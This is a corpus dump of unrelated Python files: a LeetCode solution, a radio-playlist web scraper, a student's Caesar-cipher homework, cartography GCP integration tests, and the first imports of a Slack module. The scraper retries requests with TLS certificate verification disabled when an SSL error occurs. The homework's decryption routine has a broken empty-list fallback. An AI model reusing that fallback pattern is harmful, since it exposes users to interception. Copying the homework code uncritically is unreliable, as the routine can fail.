4957e5eadb697334741df0fc297bec2edaa9e2ab
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
class MaximumAverageSubarrayI:
    """
    https://leetcode-cn.com/problems/maximum-average-subarray-i/
    """
    def findMaxAverage(self, nums: List[int], k: int) -> float:
        # Sliding window: keep a running sum of the current k elements.
        best = curr = sum(nums[:k])
        for i in range(k, len(nums)):
            curr += nums[i] - nums[i - k]
            best = max(best, curr)
        return best / k
| 19.6 | 64 | 0.602041 | 185 | 0.943878 | 0 | 0 | 0 | 0 | 0 | 0 | 76 | 0.387755 |
1fb8c0338db15cdfd4d8333778bf52ca725b2f55
| 5,925 |
py
|
Python
|
__main__.py
|
Naruto0/fplyst
|
af5c30a5bbd91ace21c3c5305c8e202ba016ba09
|
[
"MIT"
] | null | null | null |
__main__.py
|
Naruto0/fplyst
|
af5c30a5bbd91ace21c3c5305c8e202ba016ba09
|
[
"MIT"
] | 3 |
2021-03-22T17:12:14.000Z
|
2021-12-13T19:39:39.000Z
|
__main__.py
|
Naruto0/fplyst
|
af5c30a5bbd91ace21c3c5305c8e202ba016ba09
|
[
"MIT"
] | null | null | null |
#! /usr/bin/python3
#
# Usage:
#
# path/to/script$ python3 __main__.py -c <config_file>
#
# Will create 'YYYY_MM_DD_STREAMNAME_PLAYLIST.txt' file
# which will contain currently captured song
#
# HH:MM Interpret - Song Name
#
# To capture whole playlist you have to
# make a crontab schedule or Windows/Mac equivalent.
#
# Crontab job should run every minute
# which is enough to make sure the timing is
# correct.
# You may want to make sure that the files are
# saved in the right directory; the config file is optional:
#
# */1 * * * * cd <path to script> && python3 __main__.py [-c myConfig.json]
#
# If you want to make your own config file
# edit the variables which make the _dictionary
# underneath the imports.
# (e.g. _station, _url, _interpret_path, _song_name_path)
#
# Then run:
#
# you@host~/.../fplyst$ python3 -i __main__.py
#
# In the python prompt you either call the method
# without any arguments, which overwrites the
# original config file...
#
# >>> make_config()
#
# ...or you feed it with a filename,
# which you may then use to import
# config for various stations.
#
# >>> make_config("myConfig.json")
#
# (json extension is optional)
#
# If you are familiar enough with xpath syntax,
# it shouldn't be hard for you to easily
# set up the html xpaths for the interpret and the song.
#
# TODO: include selenium to support javascript generated <html>
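#
# For illustration, the config.json written by make_config() with the default
# values defined below looks roughly like this (the xpaths depend on the station):
#
#   {"station": "EVROPA2", "web_page": "https://www.evropa2.cz",
#    "interpret_xpath": "//h3[@class=\"author\"]",
#    "song_xpath": "//h4[@class=\"song\"]"}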
import sys
import json
import getopt
import time as _t
from requests import get
from requests.exceptions import ConnectionError, SSLError
with open("requirements.txt", "r") as _req_file:
_req = _req_file.readlines()
try:
from lxml import html
from selenium import webdriver
from pyvirtualdisplay import Display
except ImportError:
if _req:
print("You have to install modules: ")
for module in _req:
print("\t%s"%module)
else:
print("Unexpected error")
sys.exit(2)
_config = {}
_selenium = False
_station = 'EVROPA2'
_url = 'https://www.evropa2.cz'
_interpret_path = '//h3[@class="author"]'
_song_name_path = '//h4[@class="song"]'
_dictionary = { 'station':_station, 'web_page':_url, \
'interpret_xpath':_interpret_path,\
'song_xpath':_song_name_path}
def write_last(song):
song_info = song[:2]
station = song[2]
last_name = ".last_on_%s.json"%(station)
with open(last_name, 'w') as f:
json.dump(song, f)
def read_last(station=None):
try:
last_name = ".last_on_%s.json"%(station)
with open(last_name, 'r') as f:
data = json.load(f)
return data
except IOError:
return []
def make_config(filename=None):
    if not filename:
        filename = 'config.json'
with open(filename, 'w') as f:
json.dump(_dictionary, f)
def read_config(filename):
try:
with open(filename, 'r') as f:
global _config
_config = json.load(f)
except EnvironmentError:
print('bad config file "%s"'%filename)
sys.exit(2)
def get_time():
'''What time it is now?'''
now = _t.localtime()
date = _t.strftime("%Y_%m_%d", now)
hour_minute = _t.strftime("%H:%M", now)
return [date, hour_minute]
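# For illustration, get_time() returns something like ['2021_03_22', '17:12'];
# save() below uses the date for the file name and the HH:MM for the line prefix.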
def save(args):
'''We are definitely saving this song.'''
file_name = "%s_%s_PLAYLIST.txt"%(args[3],args[2])
string = "%s\t%s - %s\n"%(args[4],args[0],args[1])
with open(file_name, "a") as myfile:
myfile.write(string)
def record(*args,**kwargs):
'''Do we really need to save current song?'''
playing = fetch(*args,**kwargs)
print(playing)
current = read_last(playing[2])
if playing:
if current != playing:
save(playing+get_time())
write_last(playing)
else:
# print("[log-%s]not saving %s - %s"%(get_time()[1],current[0],current[1]))
pass
def fetch(web_page, interpret_xpath, song_xpath, station):
'''What are they playing?'''
global _selenium
if _selenium:
display = Display(visible=0, size=(800, 600))
display.start()
browser = webdriver.Firefox()
browser.get(web_page)
try:
interpret = browser.find_element_by_xpath(interpret_xpath).text
except:
interpret = ''
try:
song = browser.find_element_by_xpath(song_xpath).text
except:
song = ''
browser.quit()
display.stop()
if interpret and song:
return [interpret, song, station]
else:
return ['','',station]
else:
try:
page = get(web_page)
except SSLError:
page = get(web_page, verify=False)
except ConnectionError:
print ("No internet connection aviable")
sys.exit(2)
tree = html.fromstring(page.content)
interpret_list = tree.xpath(interpret_xpath)
song_list = tree.xpath(song_xpath)
if interpret_list and song_list:
return [interpret_list[0], song_list[0], station]
else:
return []
def job(name):
print(name)
record()
def main(argv):
read_config('config.json')
global _selenium
help_string = '''__main__.py -c <config_file.json> \t -or we load default config.json
-h \t\t - help
-s \t\t - use selenium instead of requests (for javascript generated html)'''
if argv:
try:
opts, args = getopt.getopt(argv,"hsc:",["conf="])
except getopt.GetoptError:
print(help_string)
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print(help_string)
sys.exit(2)
elif opt == '-s':
_selenium = True
elif opt in('-c','--conf'):
read_config(arg)
record(**_config)
if __name__ == '__main__':
main(sys.argv[1:])
| 25.320513 | 89 | 0.606076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,118 | 0.357468 |
1fbb637cd9392b8a2ffe427325fa61c758a9f423
| 14,341 |
py
|
Python
|
1_ps4/ps4b.py
|
gyalpodongo/6.0001_psets
|
b2e12d572d3382921a073e6712a337f98ade7c4a
|
[
"MIT"
] | null | null | null |
1_ps4/ps4b.py
|
gyalpodongo/6.0001_psets
|
b2e12d572d3382921a073e6712a337f98ade7c4a
|
[
"MIT"
] | null | null | null |
1_ps4/ps4b.py
|
gyalpodongo/6.0001_psets
|
b2e12d572d3382921a073e6712a337f98ade7c4a
|
[
"MIT"
] | null | null | null |
# Problem Set 4B
# Name: Gyalpo Dongo
# Collaborators:
# Time Spent: 9:00
# Late Days Used: 1
import string
### HELPER CODE ###
def load_words(file_name):
'''
file_name (string): the name of the file containing
the list of words to load
Returns: a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
'''
print("Loading word list from file...")
# inFile: file
inFile = open(file_name, 'r')
# wordlist: list of strings
wordlist = []
for line in inFile:
wordlist.extend([word.lower() for word in line.split(' ')])
print(" ", len(wordlist), "words loaded.")
return wordlist
def is_word(word_list, word):
'''
Determines if word is a valid word, ignoring
capitalization and punctuation
word_list (list): list of words in the dictionary.
word (string): a possible word.
Returns: True if word is in word_list, False otherwise
Example:
>>> is_word(word_list, 'bat') returns
True
>>> is_word(word_list, 'asdf') returns
False
'''
word = word.lower()
word = word.strip(" !@#$%^&*()-_+={}[]|\:;'<>?,./\"")
return word in word_list
def get_story_string():
"""
Returns: a story in encrypted text.
"""
f = open("story.txt", "r")
story = str(f.read())
f.close()
return story
def get_digit_shift(input_shift, decrypt):
'''
calculate the digit shift based on if decrypting or not
decrypt: boolean, if decrypting or not
Returns: digit_shift, the digit shift based on if decrypting or not
'''
if decrypt:
digit_shift = 10 - (26-input_shift)%10
else:
digit_shift = input_shift
return digit_shift
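# Worked example (illustrative): get_digit_shift(3, False) returns 3, while
# get_digit_shift(3, True) returns 10 - (26 - 3) % 10 = 7.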
### END HELPER CODE ###
WORDLIST_FILENAME = 'words.txt'
class Message(object):
def __init__(self, input_text):
'''
Initializes a Message object
input_text (string): the message's text
a Message object has two attributes:
self.message_text (string, determined by input text)
self.valid_words (list, determined using helper function load_words)
'''
self.message_text = input_text
self.valid_words = load_words(WORDLIST_FILENAME)
def get_message_text(self):
'''
Used to safely access self.message_text outside of the class
Returns: self.message_text
'''
return self.message_text
def get_valid_words(self):
'''
Used to safely access a copy of self.valid_words outside of the class.
This helps you avoid accidentally mutating class attributes.
Returns: a COPY of self.valid_words
'''
return self.valid_words.copy()
def make_shift_dict(self, input_shift, decrypt=False):#THINK NEG NUMBERS
'''
Creates a dictionary that can be used to apply a cipher to a letter and number.
The dictionary maps every uppercase and lowercase letter to a
character shifted down the alphabet by the input shift, as well as
every number to one shifted down by the same amount. If 'a' is
shifted down by 2, the result is 'c' and '0' shifted down by 2 is '2'.
The dictionary should contain 62 keys of all the uppercase letters,
all the lowercase letters, and all numbers mapped to their shifted values.
input_shift: the amount by which to shift every letter of the
alphabet and every number (0 <= shift < 26)
decrypt: if the shift dict will be used for decrypting. affects digit shift function
Returns: a dictionary mapping letter/number (string) to
another letter/number (string).
'''
dig_shift = get_digit_shift(input_shift,decrypt)
#gets the new value for the shift in the digits
dict_shift = {}
for i in range(len(string.ascii_lowercase)):
if input_shift > 25:
new_input_shift = input_shift - 26
else:
new_input_shift = input_shift
if (i+new_input_shift) > 25:
t = (i+new_input_shift) - 26
dict_shift[string.ascii_lowercase[i]] = string.ascii_lowercase[t]
else:
dict_shift[string.ascii_lowercase[i]] = string.ascii_lowercase[i+new_input_shift]
for i in range(len(string.ascii_uppercase)):
if input_shift > 25:
new_input_shift = input_shift - 26
else:
new_input_shift = input_shift
if (i+new_input_shift) > 25:
t = (i+new_input_shift) - 26
dict_shift[string.ascii_uppercase[i]] = string.ascii_uppercase[t]
else:
dict_shift[string.ascii_uppercase[i]] = string.ascii_uppercase[i+new_input_shift]
for i in range(len(string.digits)):
if dig_shift > 19:
new_dig_shift = dig_shift - 20
elif dig_shift > 9:
new_dig_shift = dig_shift - 10
else:
new_dig_shift = dig_shift
if (i+new_dig_shift) > 9:
t = (i+new_dig_shift) - 10
dict_shift[string.digits[i]] = string.digits[t]
else:
dict_shift[string.digits[i]] = string.digits[i+new_dig_shift]
return dict_shift
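    # Illustrative mapping for input_shift=2, consistent with the docstring
    # above (not part of the original assignment):
    #   'a' -> 'c', 'Y' -> 'A', '0' -> '2', '9' -> '1'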
def apply_shift(self, shift_dict):
'''
Applies the Caesar Cipher to self.message_text with the shift
specified in shift_dict. Creates a new string that is self.message_text,
shifted down by some number of characters, determined by the shift
value that shift_dict was built with.
shift_dict: a dictionary with 62 keys, mapping
lowercase and uppercase letters and numbers to their new letters
(as built by make_shift_dict)
Returns: the message text (string) with every letter/number shifted using
the input shift_dict
'''
new_str = ""
for i in self.get_message_text():
if str(i) in shift_dict:
#if str(i) is any of the keys in the dictionnary, then
#it shifted value will be added to new_str
new_str += shift_dict[str(i)]
else:
new_str += str(i)
#this is for when it is either punctuations or other symbols
#or spacesso that they are not modified as problem specified
return new_str
class PlaintextMessage(Message):
def __init__(self, input_text, input_shift):
'''
Initializes a PlaintextMessage object.
input_text (string): the message's text
input_shift: the shift associated with this message
A PlaintextMessage object inherits from Message. It has five attributes:
self.message_text (string, determined by input text)
self.valid_words (list, determined using helper function load_words)
self.shift (integer, determined by input shift)
self.encryption_dict (dictionary, built using the shift)
self.encrypted_message_text (string, encrypted using self.encryption_dict)
'''
Message.__init__(self,input_text)
self.shift = input_shift
self.encryption_dict = self.make_shift_dict(self.shift)
self.encrypted_message_text = self.apply_shift(self.encryption_dict)
def get_shift(self):
'''
Used to safely access self.shift outside of the class
Returns: self.shift
'''
return self.shift
def get_encryption_dict(self):
'''
Used to safely access a copy of self.encryption_dict outside of the class
Returns: a COPY of self.encryption_dict
'''
return self.encryption_dict.copy()
def get_encrypted_message_text(self):
'''
Used to safely access self.encrypted_message_text outside of the class
Returns: self.encrypted_message_text
'''
return self.encrypted_message_text
def modify_shift(self, input_shift):
'''
Changes self.shift of the PlaintextMessage, and updates any other
attributes that are determined by the shift.
input_shift: an integer, the new shift that should be associated with this message.
[0 <= shift < 26]
Returns: nothing
'''
self.__init__(self.message_text,input_shift)
self.shift = input_shift
class EncryptedMessage(Message):
def __init__(self, input_text):
'''
Initializes an EncryptedMessage object
input_text (string): the message's text
an EncryptedMessage object inherits from Message. It has two attributes:
self.message_text (string, determined by input text)
self.valid_words (list, determined using helper function load_words)
'''
Message.__init__(self,input_text)
def decrypt_message(self):
'''
Decrypts self.message_text by trying every possible shift value and
finding the "best" one.
We will define "best" as the shift that creates the max number of
valid English words when we use apply_shift(shift) on the message text.
If a is the original shift value used to encrypt the message, then
we would expect (26 - a) to be the value found for decrypting it.
Note: if shifts are equally good, such that they all create the
max number of valid words, you may choose any of those shifts
(and their corresponding decrypted messages) to return.
Returns: a tuple of the best shift value used to originally encrypt
the message (a) and the decrypted message text using that shift value
'''
input_scores = {}
        #this will be a dictionary with the different shifts as the keys
        #and the values of these keys will be a tuple of the respective
#amount (score) of valid words found after applying this shift and the text
#with this applied shift
list_scores = []
list_tuples = []
#use of list for the tuples of best_shift and text as there can be
#many of these
for i in range(26):
#use of range 26 as that is the max
t = 0
#use of t as a counter for the amount of valid words in the
#decrypted text
shift_dict = self.make_shift_dict(26 - i, True).copy()
shift_text = self.apply_shift(shift_dict)
valid_words_list = self.valid_words.copy()
for b in valid_words_list:
if b in shift_text.lower():
t += 1
input_scores[i] = (t,shift_text)
list_scores.append(t)
for i in input_scores:
if input_scores[i][0] == max(list_scores):
list_tuples.append((i,input_scores[i][1]))
import random
if len(list_tuples) > 0:
return random.choice(list_tuples)
else:
return list_tuples[0]
        #return the 0 index because it is the only value, and if
        #all of them have the same score, as the problem stated, any one
        #can be returned, so use of the random module to choose
def test_plaintext_message():
'''
Write two test cases for the PlaintextMessage class here.
Each one should handle different cases (see handout for
more details.) Write a comment above each test explaining what
case(s) it is testing.
'''
#Testing for numbers
plaintext1 = PlaintextMessage("231.45", 2)
print('Expected Output: 453.67')
print('Actual Output:', plaintext1.get_encrypted_message_text())
#Testing for Capitals and numbers
plaintext1 = PlaintextMessage("HeLLo 23.21", 3)
print('Expected Output: KhOOr 56.54')
print('Actual Output:', plaintext1.get_encrypted_message_text())
# #### Example test case (PlaintextMessage) #####
# #This test is checking encoding a lowercase string with punctuation in it.
# plaintext = PlaintextMessage('hello!', 2)
# print('Expected Output: jgnnq!')
# print('Actual Output:', plaintext.get_encrypted_message_text())
def test_encrypted_message():
'''
Write two test cases for the EncryptedMessage class here.
Each one should handle different cases (see handout for
more details.) Write a comment above each test explaining what
case(s) it is testing.
'''
# #### Example test case (EncryptedMessage) #####
# # This test is checking decoding a lowercase string with punctuation in it.
# encrypted = EncryptedMessage('jgnnq!')
# print('Expected Output:', (2, 'hello!'))
# print('Actual Output:', encrypted.decrypt_message())
#Testing for Capital Letters and lowercase
encrypted1 = EncryptedMessage('EQORwVGT')
print('Expected Output:', (2, 'COMPuTER'))
print('Actual Output:', encrypted1.decrypt_message())
#Testing for Capitals,letters,punctuation and numbers
encrypted2 = EncryptedMessage('Jgnnq42!')
print('Expected Output:', (2, 'Hello21!'))
print('Actual Output:', encrypted2.decrypt_message())
def decode_story():
'''
Write your code here to decode the story contained in the file story.txt.
Hint: use the helper function get_story_string and your EncryptedMessage class.
Returns: a tuple containing (best_shift, decoded_story)
'''
encrypted = EncryptedMessage(get_story_string())
return encrypted.decrypt_message()
if __name__ == '__main__':
# Uncomment these lines to try running your test cases
test_plaintext_message()
test_encrypted_message()
# Uncomment these lines to try running decode_story_string()
best_shift, story = decode_story()
print("Best shift:", best_shift)
print("Decoded story: ", story)
| 36.214646 | 98 | 0.619064 | 9,738 | 0.679032 | 0 | 0 | 0 | 0 | 0 | 0 | 8,498 | 0.592567 |
1fbe01d48c418a25dac0b1a8cdfdd4ff5a631b60
| 13,996 |
py
|
Python
|
tests/integration/cartography/intel/gcp/test_compute.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 2,322 |
2019-03-02T01:07:20.000Z
|
2022-03-31T20:39:12.000Z
|
tests/integration/cartography/intel/gcp/test_compute.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 462 |
2019-03-07T18:38:11.000Z
|
2022-03-31T14:55:20.000Z
|
tests/integration/cartography/intel/gcp/test_compute.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 246 |
2019-03-03T02:39:23.000Z
|
2022-02-24T09:46:38.000Z
|
import cartography.intel.gcp.compute
import tests.data.gcp.compute
TEST_UPDATE_TAG = 123456789
def _ensure_local_neo4j_has_test_instance_data(neo4j_session):
cartography.intel.gcp.compute.load_gcp_instances(
neo4j_session,
tests.data.gcp.compute.TRANSFORMED_GCP_INSTANCES,
TEST_UPDATE_TAG,
)
def _ensure_local_neo4j_has_test_vpc_data(neo4j_session):
cartography.intel.gcp.compute.load_gcp_vpcs(
neo4j_session,
tests.data.gcp.compute.TRANSFORMED_GCP_VPCS,
TEST_UPDATE_TAG,
)
def _ensure_local_neo4j_has_test_subnet_data(neo4j_session):
cartography.intel.gcp.compute.load_gcp_subnets(
neo4j_session,
tests.data.gcp.compute.TRANSFORMED_GCP_SUBNETS,
TEST_UPDATE_TAG,
)
def _ensure_local_neo4j_has_test_firewall_data(neo4j_session):
cartography.intel.gcp.compute.load_gcp_ingress_firewalls(
neo4j_session,
tests.data.gcp.compute.TRANSFORMED_FW_LIST,
TEST_UPDATE_TAG,
)
def test_transform_and_load_vpcs(neo4j_session):
"""
Test that we can correctly transform and load VPC nodes to Neo4j.
"""
vpc_res = tests.data.gcp.compute.VPC_RESPONSE
vpc_list = cartography.intel.gcp.compute.transform_gcp_vpcs(vpc_res)
cartography.intel.gcp.compute.load_gcp_vpcs(neo4j_session, vpc_list, TEST_UPDATE_TAG)
query = """
MATCH(vpc:GCPVpc{id:{VpcId}})
RETURN vpc.id, vpc.partial_uri, vpc.auto_create_subnetworks
"""
expected_vpc_id = 'projects/project-abc/global/networks/default'
nodes = neo4j_session.run(
query,
VpcId=expected_vpc_id,
)
actual_nodes = {(n['vpc.id'], n['vpc.partial_uri'], n['vpc.auto_create_subnetworks']) for n in nodes}
expected_nodes = {
(expected_vpc_id, expected_vpc_id, True),
}
assert actual_nodes == expected_nodes
def test_transform_and_load_subnets(neo4j_session):
"""
Ensure we can transform and load subnets.
"""
subnet_res = tests.data.gcp.compute.VPC_SUBNET_RESPONSE
subnet_list = cartography.intel.gcp.compute.transform_gcp_subnets(subnet_res)
cartography.intel.gcp.compute.load_gcp_subnets(neo4j_session, subnet_list, TEST_UPDATE_TAG)
query = """
MATCH(subnet:GCPSubnet)
RETURN subnet.id, subnet.region, subnet.gateway_address, subnet.ip_cidr_range, subnet.private_ip_google_access,
subnet.vpc_partial_uri
"""
nodes = neo4j_session.run(query)
actual_nodes = {
(
n['subnet.id'],
n['subnet.region'],
n['subnet.gateway_address'],
n['subnet.ip_cidr_range'],
n['subnet.private_ip_google_access'],
n['subnet.vpc_partial_uri'],
) for n in nodes
}
expected_nodes = {
(
'projects/project-abc/regions/europe-west2/subnetworks/default',
'europe-west2',
'10.0.0.1',
'10.0.0.0/20',
False,
'projects/project-abc/global/networks/default',
),
}
assert actual_nodes == expected_nodes
def test_transform_and_load_gcp_forwarding_rules(neo4j_session):
"""
Ensure that we can correctly transform and load GCP Forwarding Rules
"""
fwd_res = tests.data.gcp.compute.LIST_FORWARDING_RULES_RESPONSE
fwd_list = cartography.intel.gcp.compute.transform_gcp_forwarding_rules(fwd_res)
cartography.intel.gcp.compute.load_gcp_forwarding_rules(neo4j_session, fwd_list, TEST_UPDATE_TAG)
fwd_query = """
MATCH(f:GCPForwardingRule)
RETURN f.id, f.partial_uri, f.ip_address, f.ip_protocol, f.load_balancing_scheme, f.name, f.network, f.port_range,
f.ports, f.project_id, f.region, f.self_link, f.subnetwork, f.target
"""
objects = neo4j_session.run(fwd_query)
actual_nodes = {
(
o['f.id'],
o['f.ip_address'],
o['f.ip_protocol'],
o['f.load_balancing_scheme'],
o['f.name'],
o.get('f.port_range', None),
','.join(o.get('f.ports', None)) if o.get('f.ports', None) else None,
o['f.project_id'],
o['f.region'],
o['f.target'],
) for o in objects
}
expected_nodes = {
(
'projects/project-abc/regions/europe-west2/forwardingRules/internal-service-1111',
'10.0.0.10',
'TCP',
'INTERNAL',
'internal-service-1111',
None,
'80',
'project-abc',
'europe-west2',
'projects/project-abc/regions/europe-west2/targetPools/node-pool-12345',
),
(
'projects/project-abc/regions/europe-west2/forwardingRules/public-ingress-controller-1234567',
'1.2.3.11',
'TCP',
'EXTERNAL',
'public-ingress-controller-1234567',
'80-443',
None,
'project-abc',
'europe-west2',
'projects/project-abc/regions/europe-west2/targetVpnGateways/vpn-12345',
),
(
'projects/project-abc/regions/europe-west2/forwardingRules/shard-server-22222',
'10.0.0.20',
'TCP',
'INTERNAL',
'shard-server-22222',
None,
'10203',
'project-abc',
'europe-west2',
'projects/project-abc/regions/europe-west2/targetPools/node-pool-234567',
),
}
assert actual_nodes == expected_nodes
def test_transform_and_load_gcp_instances_and_nics(neo4j_session):
"""
Ensure that we can correctly transform and load GCP instances.
"""
instance_responses = [tests.data.gcp.compute.GCP_LIST_INSTANCES_RESPONSE]
instance_list = cartography.intel.gcp.compute.transform_gcp_instances(instance_responses)
cartography.intel.gcp.compute.load_gcp_instances(neo4j_session, instance_list, TEST_UPDATE_TAG)
instance_id1 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1-test'
instance_id2 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1'
nic_query = """
MATCH(i:GCPInstance)-[r:NETWORK_INTERFACE]->(nic:GCPNetworkInterface)
OPTIONAL MATCH (i)-[:TAGGED]->(t:GCPNetworkTag)
RETURN i.id, i.zone_name, i.project_id, i.hostname, t.value, r.lastupdated, nic.nic_id, nic.private_ip
"""
objects = neo4j_session.run(nic_query)
actual_nodes = {
(
o['i.id'],
o['i.zone_name'],
o['i.project_id'],
o['nic.nic_id'],
o['nic.private_ip'],
o['t.value'],
o['r.lastupdated'],
) for o in objects
}
expected_nodes = {
(
instance_id1,
'europe-west2-b',
'project-abc',
'projects/project-abc/zones/europe-west2-b/instances/instance-1-test/networkinterfaces/nic0',
'10.0.0.3',
None,
TEST_UPDATE_TAG,
),
(
instance_id2,
'europe-west2-b',
'project-abc',
'projects/project-abc/zones/europe-west2-b/instances/instance-1/networkinterfaces/nic0',
'10.0.0.2',
'test',
TEST_UPDATE_TAG,
),
}
assert actual_nodes == expected_nodes
def test_transform_and_load_firewalls(neo4j_session):
"""
Ensure we can correctly transform and load GCP firewalls
:param neo4j_session:
:return:
"""
fw_list = cartography.intel.gcp.compute.transform_gcp_firewall(tests.data.gcp.compute.LIST_FIREWALLS_RESPONSE)
cartography.intel.gcp.compute.load_gcp_ingress_firewalls(neo4j_session, fw_list, TEST_UPDATE_TAG)
query = """
MATCH (vpc:GCPVpc)-[r:RESOURCE]->(fw:GCPFirewall)
return vpc.id, fw.id, fw.has_target_service_accounts
"""
nodes = neo4j_session.run(query)
actual_nodes = {
(
(
n['vpc.id'],
n['fw.id'],
n['fw.has_target_service_accounts'],
)
) for n in nodes
}
expected_nodes = {
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/default-allow-icmp',
False,
),
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/default-allow-internal',
False,
),
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/default-allow-rdp',
False,
),
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/default-allow-ssh',
False,
),
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/custom-port-incoming',
False,
),
}
assert actual_nodes == expected_nodes
def test_vpc_to_subnets(neo4j_session):
"""
Ensure that subnets are connected to VPCs.
"""
_ensure_local_neo4j_has_test_vpc_data(neo4j_session)
_ensure_local_neo4j_has_test_subnet_data(neo4j_session)
query = """
MATCH(vpc:GCPVpc{id:{VpcId}})-[:RESOURCE]->(subnet:GCPSubnet)
RETURN vpc.id, subnet.id, subnet.region, subnet.gateway_address, subnet.ip_cidr_range,
subnet.private_ip_google_access
"""
expected_vpc_id = 'projects/project-abc/global/networks/default'
nodes = neo4j_session.run(
query,
VpcId=expected_vpc_id,
)
actual_nodes = {
(
n['vpc.id'],
n['subnet.id'],
n['subnet.region'],
n['subnet.gateway_address'],
n['subnet.ip_cidr_range'],
n['subnet.private_ip_google_access'],
) for n in nodes
}
expected_nodes = {
(
'projects/project-abc/global/networks/default',
'projects/project-abc/regions/europe-west2/subnetworks/default',
'europe-west2',
'10.0.0.1',
'10.0.0.0/20',
False,
),
}
assert actual_nodes == expected_nodes
def test_nics_to_access_configs(neo4j_session):
"""
Ensure that network interfaces and access configs are attached
"""
_ensure_local_neo4j_has_test_instance_data(neo4j_session)
ac_query = """
MATCH (nic:GCPNetworkInterface)-[r:RESOURCE]->(ac:GCPNicAccessConfig)
return nic.nic_id, ac.access_config_id, ac.public_ip
"""
nodes = neo4j_session.run(ac_query)
nic_id1 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1-test/networkinterfaces/nic0'
ac_id1 = f"{nic_id1}/accessconfigs/ONE_TO_ONE_NAT"
nic_id2 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1/networkinterfaces/nic0'
ac_id2 = f"{nic_id2}/accessconfigs/ONE_TO_ONE_NAT"
actual_nodes = {(n['nic.nic_id'], n['ac.access_config_id'], n['ac.public_ip']) for n in nodes}
expected_nodes = {
(nic_id1, ac_id1, '1.3.4.5'),
(nic_id2, ac_id2, '1.2.3.4'),
}
assert actual_nodes == expected_nodes
def test_nic_to_subnets(neo4j_session):
"""
Ensure that network interfaces are attached to subnets
"""
_ensure_local_neo4j_has_test_subnet_data(neo4j_session)
_ensure_local_neo4j_has_test_instance_data(neo4j_session)
subnet_query = """
MATCH (nic:GCPNetworkInterface{id:{NicId}})-[:PART_OF_SUBNET]->(subnet:GCPSubnet)
return nic.nic_id, nic.private_ip, subnet.id, subnet.gateway_address, subnet.ip_cidr_range
"""
nodes = neo4j_session.run(
subnet_query,
NicId='projects/project-abc/zones/europe-west2-b/instances/instance-1-test/networkinterfaces/nic0',
)
actual_nodes = {
(
n['nic.nic_id'],
n['nic.private_ip'],
n['subnet.id'],
n['subnet.gateway_address'],
n['subnet.ip_cidr_range'],
) for n in nodes
}
expected_nodes = {(
'projects/project-abc/zones/europe-west2-b/instances/instance-1-test/networkinterfaces/nic0',
'10.0.0.3',
'projects/project-abc/regions/europe-west2/subnetworks/default',
'10.0.0.1',
'10.0.0.0/20',
)}
assert actual_nodes == expected_nodes
def test_instance_to_vpc(neo4j_session):
_ensure_local_neo4j_has_test_vpc_data(neo4j_session)
_ensure_local_neo4j_has_test_subnet_data(neo4j_session)
_ensure_local_neo4j_has_test_instance_data(neo4j_session)
instance_id1 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1-test'
query = """
MATCH (i:GCPInstance{id:{InstanceId}})-[r:MEMBER_OF_GCP_VPC]->(v:GCPVpc)
RETURN i.id, v.id
"""
nodes = neo4j_session.run(
query,
InstanceId=instance_id1,
)
actual_nodes = {
(
n['i.id'],
n['v.id'],
) for n in nodes
}
expected_nodes = {(
instance_id1,
'projects/project-abc/global/networks/default',
)}
assert actual_nodes == expected_nodes
def test_vpc_to_firewall_to_iprule_to_iprange(neo4j_session):
_ensure_local_neo4j_has_test_vpc_data(neo4j_session)
_ensure_local_neo4j_has_test_firewall_data(neo4j_session)
query = """
MATCH (rng:IpRange{id:'0.0.0.0/0'})-[m:MEMBER_OF_IP_RULE]->(rule:IpRule{fromport:22})
-[a:ALLOWED_BY]->(fw:GCPFirewall)<-[r:RESOURCE]-(vpc:GCPVpc)
RETURN rng.id, rule.id, fw.id, fw.priority, vpc.id
"""
nodes = neo4j_session.run(query)
actual_nodes = {
(
n['rng.id'],
n['rule.id'],
n['fw.id'],
n['vpc.id'],
) for n in nodes
}
expected_nodes = {(
'0.0.0.0/0',
'projects/project-abc/global/firewalls/default-allow-ssh/allow/22tcp',
'projects/project-abc/global/firewalls/default-allow-ssh',
'projects/project-abc/global/networks/default',
)}
assert actual_nodes == expected_nodes
| 32.85446 | 118 | 0.627894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,007 | 0.429194 |
1fc21aa494251b943ab4e4b535ca093a791a6af8
| 6,208 |
py
|
Python
|
gae/backend/services/slack/slack.py
|
jlapenna/bikebuds
|
6e2b54fa2e4fa03e5ff250ca779c269ccc49a2d8
|
[
"Apache-2.0"
] | 9 |
2018-11-17T00:53:47.000Z
|
2021-03-16T05:18:01.000Z
|
gae/backend/services/slack/slack.py
|
jlapenna/bikebuds
|
6e2b54fa2e4fa03e5ff250ca779c269ccc49a2d8
|
[
"Apache-2.0"
] | 8 |
2018-11-28T17:19:07.000Z
|
2022-02-26T17:46:09.000Z
|
gae/backend/services/slack/slack.py
|
jlapenna/bikebuds
|
6e2b54fa2e4fa03e5ff250ca779c269ccc49a2d8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
import urllib
import urllib.request
import flask
from google.cloud.datastore.entity import Entity
